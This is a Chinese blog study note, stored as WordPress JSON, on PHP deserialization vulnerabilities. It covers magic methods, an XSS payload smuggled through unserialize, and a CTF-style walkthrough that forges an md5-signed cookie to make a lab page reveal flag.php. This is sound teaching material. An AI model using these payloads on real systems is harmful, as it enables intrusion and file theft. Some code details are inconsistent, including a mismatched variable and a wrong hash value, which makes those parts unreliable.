{"id":387,"date":"2022-01-18T20:06:09","date_gmt":"2022-01-18T12:06:09","guid":{"rendered":"https:\/\/www.langsasec.cn\/?p=387"},"modified":"2022-11-14T22:38:53","modified_gmt":"2022-11-14T14:38:53","slug":"phpunserilization","status":"publish","type":"post","link":"https:\/\/blog.langsasec.cn\/index.php\/2022\/01\/18\/phpunserilization\/","title":{"rendered":"PHP\u53cd\u5e8f\u5217\u5316"},"content":{"rendered":"<h3><span class=\"ez-toc-section\" id=\"%e5%ba%8f%e5%88%97%e5%8c%96%e5%92%8c%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96\"><\/span>\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\n<p>\u5e8f\u5217\u5316\uff1a\u5c06\u5bf9\u8c61\u7684\u72b6\u6001\u4fe1\u606f\u8f6c\u6362\u4e3a\u53ef\u4ee5\u5b58\u50a8\u6216\u4f20\u8f93\u7684\u5f62\u5f0f\u7684\u8fc7\u7a0b\u3002<\/p>\n<p>\u628a\u4e00\u4e2a\u5bf9\u8c61\u53d8\u6210\u53ef\u4ee5\u4f20\u8f93\u7684\u5b57\u7b26\u4e32\uff08\u7c7b\u4f3c\u6e38\u620f<strong>\u5b58\u6863<\/strong>\uff09\u3002<\/p>\n<\/li>\n<\/ul>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">class S{\n        public $test=&quot;pikachu&quot;;\n    }\n    $s=new S(); \/\/\u521b\u5efa\u4e00\u4e2a\u5bf9\u8c61\n    serialize($s); \/\/\u628a\u8fd9\u4e2a\u5bf9\u8c61\u8fdb\u884c\u5e8f\u5217\u5316\n    \u5e8f\u5217\u5316\u540e\u5f97\u5230\u7684\u7ed3\u679c\u662f\u8fd9\u4e2a\u6837\u5b50\u7684:O:1:&quot;S&quot;:1:{s:4:&quot;test&quot;;s:7:&quot;pikachu&quot;;}\n        O:\u4ee3\u8868object\n        1:\u4ee3\u8868\u5bf9\u8c61\u540d\u5b57\u957f\u5ea6\u4e3a\u4e00\u4e2a\u5b57\u7b26\n        S:\u5bf9\u8c61\u7684\u540d\u79f0\n        1:\u4ee3\u8868\u5bf9\u8c61\u91cc\u9762\u6709\u4e00\u4e2a\u53d8\u91cf\n        s:\u6570\u636e\u7c7b\u578b\n        4:\u53d8\u91cf\u540d\u79f0\u7684\u957f\u5ea6\n        test:\u53d8\u91cf\u540d\u79f0\n        s:\u6570\u636e\u7c7b\u578b\n        7:\u53d8\u91cf\u503c\u7684\u957f\u5ea6\n        
pikachu:\u53d8\u91cf\u503c<\/code><\/pre>\n<ul>\n<li>\n<p>\u53cd\u5e8f\u5217\u5316\uff1a\u5c06\u5b58\u50a8\u7684\u4e1c\u897f\u8f6c\u6362\u4e3a\u72b6\u6001\u4fe1\u606f\u3002<\/p>\n<p>\u628a\u88ab\u5e8f\u5217\u5316\u7684\u5b57\u7b26\u4e32\u8fd8\u539f\u4e3a\u5bf9\u8c61\uff08\u7c7b\u4f3c\u6e38\u620f<strong>\u8bfb\u6863<\/strong>\uff09\u3002<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">$u=unserialize(\"O:1:\"S\":1:{s:4:\"test\";s:7:\"pikachu\";}\");\n  echo $u->test; \/\/\u5f97\u5230\u7684\u7ed3\u679c\u4e3apikachu<\/code><\/pre>\n<\/li>\n<\/ul>\n<p>\u53c2\u8003\uff1a<a href=\"http:\/\/pikachu.langsasec.cn\/vul\/unserilization\/unserilization.php\">http:\/\/pikachu.langsasec.cn\/vul\/unserilization\/unserilization.php<\/a><\/p>\n<h3><span class=\"ez-toc-section\" id=\"%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e\"><\/span>\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316\u672c\u8eab\u6ca1\u6709\u95ee\u9898,\u4f46\u662f\u5982\u679c\u53cd\u5e8f\u5217\u5316\u7684\u5185\u5bb9\u662f\u7528\u6237\u53ef\u4ee5\u63a7\u5236\u7684,\u4e14\u540e\u53f0\u4e0d\u6b63\u5f53\u7684\u4f7f\u7528\u4e86PHP\u4e2d\u7684\u9b54\u6cd5\u51fd\u6570\uff08\u9b54\u672f\u65b9\u6cd5\uff09,\u5c31\u4f1a\u5bfc\u81f4\u5b89\u5168\u95ee\u9898<\/p>\n<h4><span class=\"ez-toc-section\" id=\"%e5%87%a0%e4%b8%aa%e5%87%bd%e6%95%b0\"><\/span>\u51e0\u4e2a\u51fd\u6570<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">1.__FILE__ \u83b7\u53d6\u5f53\u524d\u6587\u4ef6\u8def\u5f84\n2.show_source() \u663e\u793a\u6587\u4ef6\u6e90\u7801\n3.print_r() \u8f93\u51fa<\/code><\/pre>\n<h4><span class=\"ez-toc-section\" id=\"%e5%87%a0%e4%b8%aa%e9%ad%94%e6%9c%af%e6%96%b9%e6%b3%95\"><\/span>\u51e0\u4e2a\u9b54\u672f\u65b9\u6cd5<span 
class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u9b54\u672f\u65b9\u6cd5\uff1a\u6ee1\u8db3\u6761\u4ef6\u81ea\u52a8\u89e6\u53d1<\/p>\n<ol>\n<li>\n<p>__construct()\u5f53\u4e00\u4e2a\u5bf9\u8c61\u521b\u5efa\u65f6\u88ab\u8c03\u7528<\/p>\n<\/li>\n<li>\n<p>__destruct()\u5f53\u4e00\u4e2a\u5bf9\u8c61\u9500\u6bc1\u65f6\u88ab\u8c03\u7528<\/p>\n<\/li>\n<li>\n<p>__toString()\u5f53\u4e00\u4e2a\u5bf9\u8c61\u88ab\u5f53\u4f5c\u4e00\u4e2a\u5b57\u7b26\u4e32\u4f7f\u7528<\/p>\n<\/li>\n<li>\n<p>__sleep() \u5728\u5bf9\u8c61\u88ab\u5e8f\u5217\u5316\u4e4b\u524d\u8fd0\u884c<\/p>\n<\/li>\n<li>\n<p>__wakeup() \u5c06\u5728\u53cd\u5e8f\u5217\u5316\u4e4b\u540e\u7acb\u5373\u88ab\u8c03\u7528<\/p>\n<\/li>\n<\/ol>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">\u6f0f\u6d1e\u6848\u4f8b\n    class S{\n            var $test = &quot;pikachu&quot;;\n            function __destruct(){\n                echo $this-&gt;test;\n            }\n        }\n        $s = $_GET[&#039;test&#039;];\n        @$unser = unserialize($a);\n\n        payload:O:1:&quot;S&quot;:1:{s:4:&quot;test&quot;;s:29:&quot;&lt;script&gt;alert(&#039;xss&#039;)&lt;\/script&gt;&quot;;}<\/code><\/pre>\n<p>\u53c2\u8003\uff1a<a href=\"http:\/\/pikachu.langsasec.cn\/vul\/unserilization\/unserilization.php\">http:\/\/pikachu.langsasec.cn\/vul\/unserilization\/unserilization.php<\/a><\/p>\n<p>\u6269\u5c55\uff1aphar:\/\/(php\u652f\u6301\u7684\u534f\u8bae) \uff1a\u8fd0\u7528\u8be5\u534f\u8bae\u8bfb\u53d6\u6587\u4ef6\u53ef\u4ee5\u81ea\u52a8\u53cd\u5e8f\u5217\u5316<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%e9%9d%b6%e5%9c%ba\"><\/span>\u9776\u573a<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>1.flag\u5728flag.php\u4e2d\uff0c\u6240\u4ee5\u6211\u4eec\u9700\u8981\u901a\u8fc7\u53cd\u5e8f\u5217\u5316\u6765\u5c06\u5b83\u663e\u793a\u51fa\u6765<\/p>\n<p>2.\u4e0b\u9762\u662f\u6e90\u4ee3\u7801\u53ca\u5176\u6ce8\u91ca<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;?php\nClass readme{\n    public 
function __toString()\n    {\n        return highlight_file(&#039;Readme.txt&#039;, true).highlight_file($this-&gt;source, true); \/\/$this-&gt;source\uff1a\u8c03\u7528$source\u7684\u503c\n    }\n}\nif(isset($_GET[&#039;source&#039;])){\n    $s = new readme();\n    $s-&gt;source = __FILE__;\n    echo $s;\n    exit;\n}\n\/\/$todos = [];\u662f\u4e2a\u6570\u7ec4\nif(isset($_COOKIE[&#039;todos&#039;])){\n    $c = $_COOKIE[&#039;todos&#039;];\n    $h = substr($c, 0, 32);  \/\/$h\u662f$c\u524d32\u4f4d\u5b57\u7b26\u4e32\n    $m = substr($c, 32);     \/\/$m\u662f$c32\u4f4d\u540e\u7684\u5b57\u7b26\u4e32\n    if(md5($m) === $h){\n        $todos = unserialize($m);  \/\/\u53cd\u5e8f\u5217\u5316\u51fd\u6570\u5728\u8fd9\u91cc\n    }\n}\nif(isset($_POST[&#039;text&#039;])){\n    $todo = $_POST[&#039;text&#039;];\n    $todos[] = $todo;\n    $m = serialize($todos);\n    $h = md5($m);\n    setcookie(&#039;todos&#039;, $h.$m);\n    header(&#039;Location: &#039;.$_SERVER[&#039;REQUEST_URI&#039;]);\n    exit;\n}\n?&gt;\n&lt;html&gt;\n&lt;head&gt;\n&lt;\/head&gt;\n\n&lt;h1&gt;Readme&lt;\/h1&gt;\n&lt;a href=&quot;?source&quot;&gt;&lt;h2&gt;Check Code&lt;\/h2&gt;&lt;\/a&gt;\n&lt;ul&gt;\n&lt;?php foreach($todos as $todo):?&gt;   \/\/\u5c06\u6570\u7ec4\u53d8\u6210\u5b57\u7b26\u4e32\uff0c\n    &lt;li&gt;&lt;?=$todo?&gt;&lt;\/li&gt;  \/\/&lt;?=$todo?&gt;\/\/\u662f&lt;?php echo $todo?&gt;\/\/\u7f29\u5199\uff0c\u8f93\u51fa\u70b9\uff0c\n&lt;?php endforeach;?&gt;\n&lt;\/ul&gt;\n\n&lt;form method=&quot;post&quot; href=&quot;.&quot;&gt;\n    &lt;textarea name=&quot;text&quot;&gt;&lt;\/textarea&gt;\n    &lt;input type=&quot;submit&quot; value=&quot;store&quot;&gt;\n&lt;\/form&gt;<\/code><\/pre>\n<p>3.\u901a\u8fc7$todo\u8f93\u51fa$a-&gt;source='flag.php';\u6765\u89e6\u53d1$this-&gt;source\u4ece\u800c\u663e\u793aflag.php<\/p>\n<p>4.\u6784\u9020\u9700\u8981\u89e6\u53d1\u7684$todos,\u90a3\u4e48$m=a:1:{i:0;O:6:&quot;readme&quot;:1:{s:6:&quot;source&quot;;s:8:&quot;flag.php&quot;;}}<img decoding=\"async\" 
src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/66b0a4e9996921b0fc33983270c76e6a.png\" alt=\"image-20220118193604057\" title=\"PHP\u53cd\u5e8f\u5217\u5316\u63d2\u56fe\" \/><\/p>\n<p>[\u5916\u94fe\u56fe\u7247\u8f6c\u5b58\u5931\u8d25,\u6e90\u7ad9\u53ef\u80fd\u6709\u9632\u76d7\u94fe\u673a\u5236,\u5efa\u8bae\u5c06\u56fe\u7247\u4fdd\u5b58\u4e0b\u6765\u76f4\u63a5\u4e0a\u4f20(img-k1FctLWQ-1668436711768)(<a href=\"https:\/\/s2.loli.net\/2022\/01\/18\/7CiPvEtlVX915Gr.png\" rel=\"box\" class=\"fancybox\">https:\/\/s2.loli.net\/2022\/01\/18\/7CiPvEtlVX915Gr.png<\/a>)]<\/p>\n<p>5.\u4ece\u4ee3\u7801\u53ef\u77e5\u6211\u4eec\u9700\u8981\u4f7f\u5f97cookie\u6ee1\u8db3\u4e00\u5b9a\u7684\u6761\u4ef6<\/p>\n<p>\u6761\u4ef6\uff1a<\/p>\n<p>$c=$h.$m<\/p>\n<p>md5($m) === $h\uff0c\u5219$h=e10adc3949ba59abbe56e057f20f883e<\/p>\n<p>\u6240\u4ee5\u6700\u7ec8\u6761\u4ef6\u662f\u5c06cookie\u8bbe\u7f6etodos\u4e3a\u5982\u4e0b<\/p>\n<p>e2d4f7dcc43ee1db7f69e76303d0105ca:1:{i:0;O:6:&quot;readme&quot;:1:{s:6:&quot;source&quot;;s:8:&quot;flag.php&quot;;}}<\/p>\n<p>6.\u5c06\u4e0a\u8ff0\u5b57\u7b26\u4e32url\u7f16\u7801\u540e\u586b\u5165cookie\u5f97\u5230flag<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/aca6d12f8186b50d1fceb281293ddee6.png\" alt=\"image-20220118195558464\" title=\"PHP\u53cd\u5e8f\u5217\u5316\u63d2\u56fe1\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/eec82e4f8b97a165cb7492c0e78f25e0.png\" alt=\"image-20220118195644379\" title=\"PHP\u53cd\u5e8f\u5217\u5316\u63d2\u56fe2\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316 \u5e8f\u5217\u5316\uff1a\u5c06\u5bf9\u8c61\u7684\u72b6\u6001\u4fe1\u606f\u8f6c\u6362\u4e3a\u53ef\u4ee5\u5b58\u50a8\u6216\u4f20\u8f93\u7684\u5f62\u5f0f\u7684\u8fc7\u7a0b\u3002 \u628a\u4e00\u4e2a\u5bf9\u8c61\u53d8\u6210\u53ef\u4ee5\u4f20\u8f93\u7684\u5b57\u7b26\u4e32\uff08 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,19],"tags":[],"class_list":["post-387","post","type-post","status-publish","format-standard","hentry","category-webpt-studynote","category-penetration-test"],"_links":{"self":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/387","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/comments?post=387"}],"version-history":[{"count":4,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/387\/revisions"}],"predecessor-version":[{"id":1068,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/387\/revisions\/1068"}],"wp:attachment":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/media?parent=387"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/categories?post=387"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/tags?post=387"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}